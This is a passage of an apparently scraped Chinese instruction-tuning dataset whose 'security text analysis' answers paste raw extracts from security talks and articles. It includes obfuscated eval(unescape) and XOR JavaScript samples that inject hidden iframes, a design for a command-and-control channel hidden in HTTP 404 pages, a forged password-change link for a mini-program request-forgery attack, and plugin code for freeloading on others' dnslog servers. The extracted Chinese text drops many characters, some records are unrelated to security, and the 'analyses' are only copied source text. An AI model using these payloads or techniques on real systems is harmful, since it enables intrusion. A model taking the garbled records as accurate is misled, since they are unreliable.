SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND 16514 oracle 19 4 28796 26M 20252 T N 0.0 2.5 0:04 0 oraclePRODB2... ``` 现在CPU 从 0% 空闲变为 94% 空闲该进程被有效冻结过一段时间之后您可能希望唤醒该进程 ```shell skill -CONT 16514 ``` 如果希望暂时冻结进程以便为完成更重要的进程腾出空间该方法非常有用 此命令用途很广如果您要停止 \"oracle\" 用户的所有进程只需要一个命令即可实现 ```shell skill -STOP oracle ``` 可以使用用户PID命令或终端 id 作为参数以下命令可停止所有 rman 命令 ```shell skill -STOP rman ``` 如您所见skill 决定您输入的参数进程 ID用户 ID 或命令并进行相应操作这可能会导致在某些情况下出现这样的问题您可能具有同名的用户和命令最好的示例是 \"oracle\" 进程通常由用户 \"oracle\" 运行因此当您希望停止名为 \"oracle\" 的进程时可执行以下命令 ```shell skill -STOP oracle ``` 用户 \"oracle\" 的所有进程都停止包括您可能要使用的会话要非常明确地执行命令您可以选择使用一个新参数指定参数的类型要停止一个名为 oracle 的命令可执行以下命令 ```shell skill -STOP -c oracle ``", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njava.io.ObjectInputStream 反序列化分析 - Skay 这主要参考了李三师傅的章 http://redteam.today/2020/02/14/Java%E5%8E%9F%E 7%94%9F%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%B A%8F%E5%88%97%E5%8C%96%E4%BB%A3%E7%A0%81%E7%AE%80%E8%A6%8 1%E5%88%86%E6%9E%90/ 膜膜膜 感觉看了章下明了好多当然还有好很多疑问 图镇楼 (1) 先起个Demo调试环境 被序列化的类 /** 1 我们的序列化和反序列化法 * @auther Skay 2 * @date 2020/12/20 22:06 3 * @description 4 */ 5 public class theObj implements java.io.Serializable{ 6 public String theObj; 7 public void mailCheck() 8 { 9 System.out.println(\"This is the \"+this.theObj); 10 } 11 } 12 import java.io.*; 1 2 /** 3 * @auther Skay 4 * @date 2020/12/20 22:07 5 * @description 6 */ 7 public class SerializeDemo { 8 public static void main(String [] args) 9 { 10 serialize(); 11 deserialize(); 12 } 13 14 public static void serialize(){ 15 theObj theobj = new theObj(); 16 theobj.theObj = \"I'm the obj\"; 17 try 18 { 19 // 打开一个文件输入流 20 FileOutputStream fileOut = 21 new FileOutputStream(\"se.txt\"); 22 // 建立对象输入流 23 ObjectOutputStream out = new ObjectOutputStream(fileOut); 24 //输出反序列化对象 25 out.writeObject(theobj); 26 out.close(); 27 fileOut.close(); 28 System.out.printf(\"Serialized data is saved in se.txt\\n\"); 29 }catch(Exception e) 30 { 31 e.printStackTrace(); 32 } 33 } 34 35 public static void deserialize(){ 36 theObj theobj = null; 37 try 38 { 39 运如下 (2) 调试分析 1.序列化 writeobject 1.1 预处理 我们断点下到writeobject中先进预处理逻辑进writeobject0 // 打开一个文件输入流 40 FileInputStream fileIn = new FileInputStream(\"se.txt\"); 41 // 建立对象输入流 42 ObjectInputStream in = new ObjectInputStream(fileIn); 43 // 读取对象 44 theobj = (theObj) in.readObject(); 45 in.close(); 46 fileIn.close(); 47 }catch(Exception e) 48 { 49 e.printStackTrace(); 50 return; 51 } 52 System.out.println(\"Deserialized theObj...\"); 53 System.out.println(\"This is the \"+theobj.theObj); 54 } 55 } 56 这参考章提到的是通过内省拿到desc(ObjectOutputStreamClass), 官档中描述ObjectOutputStreamClass 类的序列化描述符它包含类的名称和 serialVersionUID可以使 lookup 法找到/创建 在此 Java VM 中加载的具体类的 ObjectStreamClass 以便于后期对标类进内省(内省我暂时的理解是反射的阉割版本阉割了反射的修改功 能但是暂时", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Qualcomm WLAN And Modem Over-The-Air Xiling Gong, Peter Pi Tencent Blade Team About Us Xiling Gong (@GXiling) Senior security researcher at Tencent Blade Team. Focus on Android Security, Qualcomm Firmware Security. Speaker of BlackHat, CanSecWest. Peter Pi(@tencent_blade) Senior security researcher at Tencent Blade Team. Find many vulnerabilities of vendors like Google, Microsoft, Apple, Qualcomm, Adobe and Tesla. The #1 Researcher of Google Android VRP in year 2016. Speaker of BlackHat, CanSecWest, HITB, GSEC and Hitcon. About Tencent Blade Team  Founded by Tencent Security Platform Department in 2017  Focus on security research in the areas of AIoT, Mobile devices, Cloud virtualization, Blockchain, etc  Report 200+ vulnerabilities to vendors such as Google, Apple, Microsoft, Amazon  We talked about how to break Amazon Echo at DEFCON26  Blog: https://blade.tencent.com Agenda  Introduction and Related Work  The Debugger  Reverse Engineering and Attack Surface  Vulnerability and Exploitation  Escaping into Modem  Escaping into Kernel  Stability of Exploitation  Conclusions Agenda  Introduction and Related Work  The Debugger  Reverse Engineering and Attack Surface  Vulnerability and Exploitation  Escaping into Modem  Escaping into Kernel  Stability of Exploitation  Conclusions Introduction  Broadcom WIFI Chip  2017, Gal Beniamini  Over The Air: Exploiting Broadcoms Wi-Fi Stack  2017, Nitay Artenstein, BlackHat USA 2017  BROADPWN: REMOTELY COMPROMISING ANDROID AND IOS VIA A BUG IN BROADCOM'S WI-FI CHIPSETS  Marvel WIFI Chip  2019, Denis Selyanin  Zero Nights 2018 , Researching Marvell Avastar Wi-Fi: from zero knowledge to over- the-air zero-touch RCE  Blog 2019, Remotely compromise devices by using bugs in Marvell Avastar Wi-Fi: from zero knowledge to zero-click RCE  How about Qualcomm WIFI? Qualcomm WLAN (MSM8998) WLAN Firmware Baseband Subsystem Linux Kernel QCACLD2/3 Full MAC Layer Application Android Framework Wifi Demon Modem Firmware Agenda  Introducti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 程序加载 程序加载过程其实就是系统创建或者扩充进程镜像的过程它只是按照一定的规则把文件的段拷贝到虚拟内存段中进程只有在执行的过程中使用了对应的逻辑页面时才会申请相应的物理页面通常来说一个进程中有很多页是没有被引用的因此延迟物理读写可以提高系统的性能为了达到这样的效率可执行文件以及共享目标文件所拥有的段的文件偏移以及虚拟地址必须是合适的也就是说他们必须是页大小的整数倍 在 Intel 架构中虚拟地址以及文件偏移必须是 4KB或者更大的数且为 2 的整数幂次的整数倍 下面是一个可执行文件加载到内存中布局的例子 对应的代码段以及数据段的解释如下 在这个例子中尽管代码段和数据段在模4KB的意义下相等但是仍然最多有4个页面包含有不纯的代码或者数据当然实际中会取决于页大小或者文件系统的块大小 - 代码段的第一个页包含了ELF头程序头部表以及其他信息 - 代码段的最后一页包含了数据段开始部分的副本 - 数据段的最后一页包含了代码段的最后部分的副本至于多少暂未说明 - 数据段的最后一部分可能会包含与程序运行无关的信息 逻辑上说系统会对强制控制内存的权限就好比每一个段的权限都是完全独立的段的地址会被调整以便于确保内存中的每一个逻辑页都只有一组类型的权限在上面给出的例子中文件的代码段的最后一部分和数据段的开始部分都会被映射两次分别在数据段的虚拟地址以及代码段的虚拟地址 数据段的结尾需要好好处理没有被初始化的数据一般来说系统要求它们以0开始因此如果一个文件的最后一页包含不在逻辑页中的信息那么剩下的数据必须被初始化为0剩下的三个页中的杂质数据在逻辑上说并不是进程镜像的一部分系统可以选择删除它们该文件对应的虚拟内存镜像如下假设每一页大小为4KB 在加载段时可执行文件与共享目标文件有所区别可执行文件通常来说包含绝对代码为了能够使得程序正确执行每一个段应该在用于构建可执行文件的虚拟地址处因此系统直接使用p_vaddr作为虚拟地址 另一方面共享目标文件通常包含地址独立代码这使得在不同的进程中同一段的虚拟地址可能会有所不同但这并不会影响程序的执行行为尽管系统会为不同的进程选择不同的虚拟地址但是它仍旧维持了段的相对地址因为地址独立代码在不同的段中使用相对地址因此在虚拟内存中的虚拟地址之间的差肯定和在文件中的相应的虚拟地址的差相同下面给出了可能的对于同一共享目标文件不同进程的情况描述了相对地址寻址此外这个表还给出了基地址的计算方法", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMesaTEE SGX借助 Intel SGX 重新 定义人工智能和大数据分析 Yu Ding 百度 X-Lab 安全研究员 May-29-2019 自我介绍  https://dingelish.com  https://github.com/dingelish  https://github.com/baidu/rust-sgx-sdk  在百度 X-Lab 担任安全研究员  Rust 爱好者  漏洞利用/缓解领域博士  从事 Rust-SGX 项目 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 适用于 隐私保护 计算的 Intel SGX  Intel SGX 背景  基于 Intel SGX 构建隐私保护计算软件栈所面临的挑战 Hybrid Memory Safety  经验法则  Intel SGX 实践 塑造 安全 并且 可信 的人工智能/大数据分析框架  可信到底指什么  使用 Intel SGX 实现可信赖的人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 适用于 隐私保护 计算的 Intel SGX  Intel SGX 背景  基于 Intel SGX 构建隐私保护计算软件栈所面临的挑战 Hybrid Memory Safety  经验法则  Intel SGX 实践 塑造 安全 并且 可信 的人工智能/大数据分析框架  可信 (Trustworthy) 到底指什么  使用 Intel SGX 实现可信赖的人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析  云供应商  数据所有者  算法提供商也可以是数据所有者  相互之间无法信任  数据离开所有者后依然可以 保证 能够 受到控制 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析  解决方案概述  使用 Intel SGX 建立信任和 TEE  安全可信的身份验证/授权  安全可信的渠道  安全可信的执行环境  使用 hybrid memory safety 构建系统  可信赖的人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 MesaTEE SGX 借助 Intel SGX 重新定义人工智能和大数据分析 适用于 隐私保护 计算的 Intel SGX  Intel SGX 背景  基于 Intel SGX 构建隐私保护计算软件栈所面临的挑战 Hybrid Memory Safety  经验法则  Intel SGX 实践 塑造 安全 并且 可信 的人工智能和大数据分析框架  可信 (Trustworthy) 到底指什么  使用 Intel SGX 实现可信赖的人工智能和大数据分析 Intel SGX 背景 面对高特权代码攻击应用无法受到保护 Intel Software Guard Extensions(Intel SGX) Frank McKeen, Intel Labs, April 15, 2015 Intel SGX 背景 使用/不使用 Intel SGX Enclaves 时的攻击面 Intel Software Guard Extensions(Intel SGX) Frank McKeen, Intel Labs, April 15, 2015 Intel SGX 背景 地址转换过程中的内存访问控制 Intel Software Guard Extensions(Intel SGX) Frank McKeen, Intel Labs, April 15, 2015 Intel SGX 背景 机密性和完整性保证 Intel Software Guard Extensions(Intel SGX) Frank McKeen, Intel Labs, April 15, 2015 Intel SGX 背景 测量和证实 验证测量/签名方 通过远程证实 Remote Attestation 建立信任 Sealing and Attestation in Intel Software Guard Extensions (SGX) Rebekah Leslie-Hurd, Intel Corporation, January 8th, 2016 Intel SGX 背景 远程证实 Figure is from A First Step Towards Leveraging Commod", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n优雅的使Dnslog平台 0x01 强迫症难受的需求点 在可的 dnslog 平台越来越多之后各种 burpsuite 插件主动被动扫描满天去公开的的 dnslog 平台把信息 填过来就没美滋滋的刷洞但是有个问题 公开的 dnslog 地址容易被 ban 公司建的 dnslog 不让我 建的可能被溯源 0x02 癞蛤蟆想吃天鹅 就没有可能稳定不怕溯源不被 ban 吗接着这个想法找到了种嫖别的 dnslog 服务器的可能性 Github 上已经有了很多师傅们开发的各种键 dnslog 平台观摩了个后发现部分的板加上了token或者密 码验证找到了也没办法嫖 摸了圈之后还是有可的如 https://github.com/yumusb/DNSLog-Platform-Golang 的 dnslog 平台他的 demo 是 https://dig.pm 公开的板可以直接 他还做了特征在 header  Fofa 的结果不算多但是够了 简单看了哈他的接 获取域名https://dig.pm/new_gen 不需要验证 获取结果 同样不需要验证传递哈 token 就好那就稳的 不过看了圈 fofa 上的之后发现有好多张这个样Github上瞧了眼 releases 应该是不同版本的平台不过好 在接 api 都是样的问题不 0x03 魔改 Log4j2 的插件 在 https://github.com/whwlsfb/Log4j2Scan 的基础上开始添加持 DNSLog-Platform-Golang 的格式 照着他原有的 DnslogCN 的调格式新增了个 DnslogPlatform 获取 api 的域名和 token 刷新 dnslog 结果出来判断拼接的域名字符 UI 也是向他原有的框架添加新的选项 private void initDomain() { try { Utils.Callback.printOutput(\"Get domain...\"); Response resp = client.newCall(GetDefaultRequest(baseUrl + \"/new_gen\").build()).execute(); JSONObject jObj = JSON.parseObject(resp.body().string()); rootDomain = jObj.getString(\"domain\"); token = jObj.getString(\"token\"); Utils.Callback.printOutput(String.format(\"Domain: %s\", rootDomain)); Utils.Callback.printOutput(String.format(\"Token: %s\", token)); startSessionHeartbeat(); } catch (Exception ex) { Utils.Callback.printError(\"initDomain failed: \" + ex.getMessage()); } } public boolean flushCache() { try { Response resp = client.newCall(HttpUtils.GetDefaultRequest(baseUrl + \"/\" +token).build()).execute(); dnsLogResultCache = resp.body().string().toLowerCase(); Utils.Callback.printOutput(String.format(\"Get Result: %s\", dnsLogResultCache)); return true; } catch (Exception ex) { Utils.Callback.printOutput(String.format(\"Get Result Failed: %s\", ex.getMessage())); return false; } } 最后的样 PS我随便找的个 dnslog 他这个域名是有点意思的 0x04 扫描效果 被动扫描个 vulfocus 的 log4j2 Dnslog 地址不想了就可以去 fofa 上换别的嫖了 Fork 改好的源码放在 https://github.com/zhzyker/Log4j2Passive", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAre We Really Safe? HACKING ACCESS CONTROL SYSTEMS Dennis Maldonado u Security Consultant @ KLC Consulting u Twitter: @DennisMald u Houston Locksport Co-founder http://www.meetup.com/Houston-Locksport/ u Rebooting HAHA! (Houston Area Hackers Anonymous) Agenda u Physical Access Control System u Linear Commercial Access Control Systems u Attacks u Local u Remote u Demo/Tools u Device Enumeration Techniques u Recommendations Physical Access Control Systems Physical Access Control What do they do? Limiting access to physical location/resource u Secure areas using: u Doors u Gates u Elevators floors u Barrier Arms u Access control systems u Keypad Entry (Entry/Directory codes) u Telephone entry u Radio receivers for remotes u Proximity cards (RFID) u Swipe cards u Sensors Physical Access Control How do they work? Where are they used? u Use cases: u Gated Communities u Parking Garages u Office Buildings u Apartments u Hotels/Motels u Commercial Buildings u Recreational Facilities u Medical Facilities Doorking Chamberlain Sentex Li4Master Nortek Security & Control/Linear Controllers Linear Commercial Access Control Nortek Security & Control/Linear Controllers AE1000Plus AE2000Plus AM3Plus Linear Controller u Commercial Telephone Entry System u Utilizes a telephone line u Supports thousands of users u Networked with other controllers u Can be configured/controlled through a PC u Serial Connection Linear  TCP/IP Kit u AM-SEK Kit (Serial-to-TCP) u Converts Serial to Ethernet u Allows Management over TCP/IP network u Allows for remote management (over the internet) Linear  Typical Installation Serial Cable Ethernet Cable Management PC 192.168.0.40 AE1000Plus Controller Ethernet Cable Router/Switch 192.168.0.0/24 Software - AccessBase2000 u Add/remove users u Entry codes u Directory codes u Cards u Transmitters u Manually toggle relays u View log reports u Communicates through serial u Requires a password to authenticate PC to Controller Communication u Request u 5AA5000A110501", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Speed-Ruby --- ## 关于 Ruby - Ruby 是脚本语言 用 C 或者 Java 语言编写的程序在运行前需要执行编译这一步骤把源码翻译成计算机可以理解的机器码而用脚本语言编写的源码并不需要编译直接运行程序便可 也就是说在使用脚本语言时开发流程会从 `源码编写  源码编译  程序运行` 变为 `源码编写  程序运行` - Ruby 是面向对象的语言 - Ruby 是跨平台的语言 - Ruby 是开源软件 --- ## 入门 * [入门1](./入门/入门1.md) * [入门2-对象](./入门/入门2-对象.md) * [入门3-创建命令](./入门/入门3-创建命令.md) ## 基础 * [对象变量和常量](./基础/对象变量和常量.md) * [条件判断](./基础/条件判断.md) * [循环](./基础/循环.md) * [方法](./基础/方法.md) * [类和模块](./基础/类和模块.md) * [运算符](./基础/运算符.md) * [错误处理与异常](./基础/错误处理与异常.md) * [块](./基础/块.md) * [数值](./基础/数值.md) * [数组](./基础/数组.md) * [字符串](./基础/字符串.md) * [散列](./基础/散列.md) ## 模块 * [File类与Dir类](./模块/File类与Dir类.md) * [Encoding 类](./模块/Encoding类.md) * [IO](./模块/IO.md) * [Proc 类](./模块/Proc类.md) * [Time 类与 Date 类](./模块/Time类与Date类.md) * [正则](./模块/正则.md) ## 知识点 * [并发与线程](./笔记/并发与线程.md) * [Socket编程](./笔记/Socket编程.md) --- **`__FILE__`** ``` if __FILE__ == $0 ``` __FILE__ 是一个魔法值它存有现在运行的脚本文件的名字`$0` 是启动脚本的名字 代码里的比较结构的意思是 如果这是启动脚本的话 这允许代码作为库调用的时候不运行启动代码 而在作为执行脚本的时候调用启动代码", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.dbappsecurity.com.cn 百举百捷 红队视角下又一个突破口 再看大国独有小程序 2020.6.16/Poc Sir À propos de moi 关于我 Poc Sir Cool-Guy@C-est.Cool 雷神众测以及其他平台专业打酱油白帽子 Hack Inn  www.hackinn.com  安全议题分享平台运营者 安恒信息实习4年的最长实习生未来仍将实习 目前一直呆在法国欢迎大家来找我思考美食人参 喜欢聊聊两岸三地微博号挺多的红V蓝V橙V没V都有 Contents 目录 小程序概览 01 获取小程序源码 02 初探好玩的CMRF漏洞 03 小程序的特有API漏洞 04 05 第三方那些事 小程序概览 01 小程序他吗  太火了 后疫情时代海外人员归国离不开防疫健康码国际版 当你在微信分享微博百度网盘文件时离不开对应小程序 他已经慢慢的渗透进了我们的互联网生活 那他为什么能火呢 1.强大的平台依托谁不用微信&支付宝 2.方便轻量好东西为啥不用 3.各方重视大力发展互联网时代潮流 字节跳动 百度 京东 阿里巴巴 腾讯 今日头条 西瓜视频 抖音 皮皮虾 百度APP 京东APP 京东金融 京麦APP 高德导航 UC浏览器 淘宝 支付宝 微信 QQ QQ浏览器 哪些平台有小程序生态 单纯在小程序平台层面我们能做什么 资产搜集 信息搜集 快速搜索企业小程序 判别资产归属 轻松获取子域名 脚本源 码自取 ###### 自己送上门的信息 获取小程序源码 02 安卓保存路径/data/data/com.tencent.mm/MicroMsg/{用户ID}/appbrand/pkg/ IOS 保存路径/var/mobile/Containers/Data/Application/{程序- UUID}/Library/WechatPrivate/{用户ID}/WeApp/LocalCache/release/{小程序ID}/ .wxapkg文件 IOS 保存路径 /var/mobile/Containers/Data/ Application/{程序- UUID}/Documents/NAMAPP_ UNZIP/{随机ID}/ 未加密压缩包 还原小程序 xml (axml 阿里wxml 微信jxml 京东)  css (acsswxssjxss)  js  json 不见了 多出来的HTML文件是啥 为啥打开之后一片空白 你是谁你变了 变的开发者工具都不认识你了 支付宝小程序 微信小程序 index.js (页面名称).html wxss文件 acss文件 支付宝小程序 微信小程序 index.woker.js app-service.js js文件 js文件 支付宝小程序 微信小程序 appConfig.json app-config.json json文件 json文件 支付宝小程序 微信小程序 page-frame.html index.js wxml文件 axml文件 初探好玩的CMRF漏洞 03 看不见却实际存在的页面路径 可传入数据但又无法直接修改 pages/archives/detail.html?id=492&title= HackingDay 2019 HangZhou CMRF 跨小程序请求伪造漏洞 Cross MiniAPP Request Forgery 利用小程序对用户在对应平台上身份的 信任在获取页面传入的参数之后结合 用户已经登录的身份信息向小程序后端 发送对应的数据包从而使用户在无意 间完成一次具有危害性的请求操作 /pages/my/changepwd.html ?newpwd=新的密码 输入密码点击修改 https://example.org/user/changepwd.do? password=新密码&token=用户身份信息 构造恶意分享内容 ?newpwd=Abc123 诱导 点击 CMRF 完整 拟真 利用 Title:决定页面描述 Des:决定小程序标题 Pagepath: 决定小程序页面 路径以及传入参数内容 alipays://platformapi/startapp?appId=小程 序ID号&page=urlencode之后的页面数据 /pages/index/thorsrc?date=616&whoami=Poc-Sir  baiduboxapp://swan/小程序ID号/?传入页面数据 dingtalk://dingtalkclient/action/open_mini_app?miniApp Id=appid&page=页面?传入数据内容 支付宝调用 视频DEMO 小程序的特有API漏洞 04 微信 字节跳动 支付宝 第三方那些事 05 第三方一键", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNot-so-Limited Warranty: Target Attacks on warranties for fun and profit  High school Student  Senior in fall  Warranty Enthusiast  Reading long paragraphs is fun  Programmer for Cyberdyne Security Solutions  New startup  cyberdynesecuritysolutions.com  Email me: Darkred@cybdss.com  Any number used to identify a product  Can be for recall uses or warranty support  Types of serial number  Identifying  contains information such as year of production  Random  random values with no meaning  Sequential  Used mainly in food (123,124,125,etc.)  Usually located on the product  Sometimes accessible via software  Proof of ownership  I can now cancel your warranty  I dont agree to the terms of the warranty  Information Disclosure  Apple Information (See C# code)  Date of Purchase  Where were you on day X?  Report Stolen  Bye bye warranty  The Internet  Google Images is your friend  Calling people on craigslist  Emailing people on eBay  Stores  Flip over demo models  Guessing  Sequential serials are terrible  Owning the product  Makes up Managers and Replacement departments  Let me just check with my head of imaginary replacements  Hangs up on you  Let me just check with my manager <Click>  Treats you like a criminal  You broke the product not a defect! Technology impaired user It just wont turn on No I dont know how to reformat it Angry guy No its not my fault its yours! Let me speak to your manager! Business Owner I'm losing money every day! We need to get those reports done! Ranked on: Protection (higher score is better) Obnoxiousness (lower is better) Countermeasures used:  Not really designed to protect against attacks  This is a good thing  Batch Code (sequential)  Good for recalls, not good for protection Low protection per product. Protection 2/10 Obnoxious Rating 1/10 Countermeasures used:  Serial Number  As many attempts as you want  Bulk checker (see C# code)  Regional Locks  Online warranty status displays what country Good protection per product. Protection 4/10 Ob", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEstimates of Optical Power Output in Six Cases of Unexplained Aerial Objects with Dened Luminosity Characteristics1 JACQUES F. VALLEE 1550 California St. #6L, San Francisco, CA 94109 Abstract Ð An analysis of six cases of unexplained aerial phenomena ob- served by qualified observers over a twenty-year period in various parts of the Earth and in known physical conditions yields estimates of optical power output ranging from a few kilowatts to thousands of megawatts. This paper surveys the methods by which this parameter can be derived from witnesses statements, it discusses the various hypotheses one could propose to account for the observations and it calls for a broad re-examination of sighting files in an effort to apply this methodology to a larger sample and to better under- stand the luminosity characteristics of the reported objects. Keywords: UFOs Ð UFO sightings Ð physical evidence Introduction Some of the most striking statements made by witnesses of unusual aerial ob- jects during their debriefing by investigators have to do with the luminosity of the phenomenon. They frequently use expressions like ªit lit up the whole landscapeº or ªevery object in the area stood out, intensely thrown into relief.º Beyond these subjective statements (which could be affected by physiological and psychological factors) it is difficult to obtain reliable quantitative data on the power output of the observed objects. Typically the witnesses are surprised by the phenomenon and it is rare for them to have any basis of comparison or calibration. A few such cases do exist, however, and a special effort has been made here to derive estimates from the data. Obvious cautions are immediately raised by this exercise. By definition the source of the luminosity is an unknown phenomenon. We do not know if the light is a primary manifestation of its internal physical state (as would be the case for the sun) or a secondary one, as would be the case for the moon or an automobile headlight", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhiteSpace: A Different Approach to JavaScript Obfuscation DEFCON 16 August, 2008 Kolisar 1 Introduction  What led to WhiteSpace? 2 Agenda  What is WhiteSpace?  A Brief Survey of Current JavaScript Obfuscation Methods  The Telltale Indicators of Obfuscation  The Components of this Approach  Demo 3 What is WhiteSpace?  A different approach to JavaScript obfuscation  Hides the usual, telltale indicators of obfuscation  Not detectable by standard Obfuscated JavaScript detection methods (automatic and manual) 4 JavaScript Obfuscation Methods  What is usually encoded  Exploit code  Hidden iFrames 5 JavaScript Obfuscation Methods (cont.)  Escaped ASCII/Unicode Values eval(unescape ('%77%69%6e%64%6f%77%2e %73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f ... %35%35%20%68%65%69%67%68%74%3d %35%31%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c %61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f %69%66%72%61%6d%65%3e%27%29') ); document.write('\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d \\u0065\\u0020\\u0073\\u0072\\u0063\\u003d \\u0027\\u0068\\u0074\\u0074\\u0070 ... \\u0065\\u006e\\u003b\\u0027\\u003e\\u003c\\u002f \\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e') 6 JavaScript Obfuscation Methods (cont.)  XOR (ASCII values) function xor_str(plain_str, xor_key){ var xored_str = \"\"; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key  plain_str.charCodeAt(i)); return xored_str; } function asd(a,b){}; function qwe(c,i){};var plain_str = \"\\x8d\\xa0\\xa7\\xa0\\xa7\\xa0\\xa7\\xdb\\xcc\\xdf \\x8d\\xc0\\xc0\\x8d\\x90\\x8d\\xc3\\xc8\\xda\\x8d\\xec\\xdf\\xdf \\xcc\\xd4\\x85\\x84\\x96\\xa0\\xa7\\xdb\\xcc\\xdf\\x8d \\xc0\\xc8\\xc0\\xf2\\xcb\\xc1\\xcc\\xca\\x8d\\x90\\x8d\\x9d\\x96 ... 85\\x84\\x96\\xa0\\xa7\"; var xored_str = xor_str(plain_str, 173); eval(xored_str); 7 JavaScript Obfuscation Methods (cont.)  XOR (Character Encoding) str = \"ru`su)(:LKgtobuhno!ru`su)(!zLKw`s!fgg!<! enbtldou/bsd`udDmdldou)&nckdbu&(:LKfgg rdu@uushctud)&he&-&fgg&(:LKfgg/ rdu@uushctud)&bm`rrhe&&bm&*&rh&*#e;CE#*#87B4#*&47,74@ ... ubi)d(z||\";str2 = \"\";for (i = 0; i < str.l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我们知道hack都会使用C2命令和控制控制受感染的主机系统这些C2中的大多数都 由大型僵尸网络控制Hack只是简单地使用其中一些来访问系统使他们可以转到另一 台设备中去或窃取凭据并获得对系统的合法访问 我已经看到或听说过许多类型的C2例如IRCp2pDNSTwitterGmailICMP等 C2隐藏流量家族越来越大并且实现C2的方式每天都变得更具创造性我很少为听到任 何新的C2感到惊讶直到有一天与John Strand进行了交谈他提到了可以使用HTTP 404  File Not Found的C2 这引起了我的注意作为安全专家我知道这些以前C2 技术中的大多数很容易被检测和阻止 尽管我知道HTTP 404  File Not Found 会更难检测但过滤/阻止主机访问HTTP 404  File Not Found 很容易但是有多少安全设备会阻止HTTP 404事实上有多少安全设 备可以监视和检看网站HTTP 404大多数的安全工程师或普通人都会像我一样在浏览 网络时 通常会忽略或跳过HTTP 404在检测流量时都会是主要是在寻找流量中的异 常情况例如流量流向Internet上的奇怪地方或其他类似性质的东西而经常忽略或跳过 HTTP 404的流量 随着我的兴趣激发了我开始做一些研究看看是否有人使用这种技术攻击是否有人 已经检测到这种技术的C2型 我发现了几篇类似文章一篇题为隐藏在众目睽睽下 由皮埃尔-马克局和基督教迪特里 希的Hiding in Plain Sighthttps://www.blackhat.com/docs/eu-15/materials/eu-15- Bureau-Hiding-In-Plain-Sight-Advances-In-Malware-Covert-Communication-Channels- wp.pdf另一个是 Hiding Malicious Traffic Under the HTTP 404 Error作者He Xuhttps/ /blog.fortinet.com/2015/04/09/hide-malicious-traffic-under-the-http-404- error 在He Xu的文章中他们实际上检测出来并见证了HTTP 404  File Not Found C2文章 涵盖了他们发现的内容和技术发生的情况简单来说受感染的设备可以连接到此Web 服务器但是会返回HTTP 404  File Not Found 该HTTP 404 看起来是正常的但是 从源码上的注释我们可以看到包含base64编码的命令这些命令是指令将自身复制到 USB驱动器下载并执行可执行文件以及最后更改某些注册表项的说明 根据以上的操作方式我决定创建自己的HTTP 404  File Not Found C2但是我不仅 只希望受感染的系统获得命令并运行这些指令我希望它能够通过HTTP 404  File Not Found来控制系统并获得系统的响应 方法 00x1 第一部分是通过添加和配置.htaccess文件来设置Web服务器以将任何错误页面定向到 我选择的.html文件下面将其重定向到evil.html 作为攻击者此Web服务器可以是他们自己的服务器或他们控制的Web服务器也可以 是他们具有访问权的服务器肉鸡设置站点并设置HTTP 404  File Not Found 后 我们继续进行第二部分即 C2 服务器 00x2 这是代码中最简单的部分我们把要对受感染的系统执行的命令通过base64对进行编 码将它放入带有预定义标头的html注释中然后包装到html文件中在最后将它覆盖到 HTTP 404  File Not Found的html文件中 主要我输入新命令就会覆盖到HTTP 404  File Not Found文件中对于我的测试我设置并控制了Web服务器我们可以轻松地使 用FTP上传新的html文件 00x3 下一步是创建 C2 客户端然后创建适用于Windows和Linux的命令来控制客户端以及 命令执行返回我们服务器的响应 受感染的系统必须请求某个域 在这里我使用了静态网址 过程就是 受感染的系统一旦从网站请求页面将首先确定它是否是404页面如果不是404页忽 略并等待下一个请求发出 如果是404页面则检查其源代码中是否包含注释如果找到注释则检查注释中的标题 是否与预定义的标题匹配如果标题匹配则解码base64字符串并执行命令 这部分代码有点困难因为我不仅要在受感染的系统上执行命令同时还希望能够向 Linux和Windows提供基本通用命令最后我还希望将已执行命令的结果发送回服务 器 我在 C2 解决此问题的方法是确定受感染的系统是Linux还是Windows在Windows 上 ", "category": "text_analysis", "source": "security_papers"}
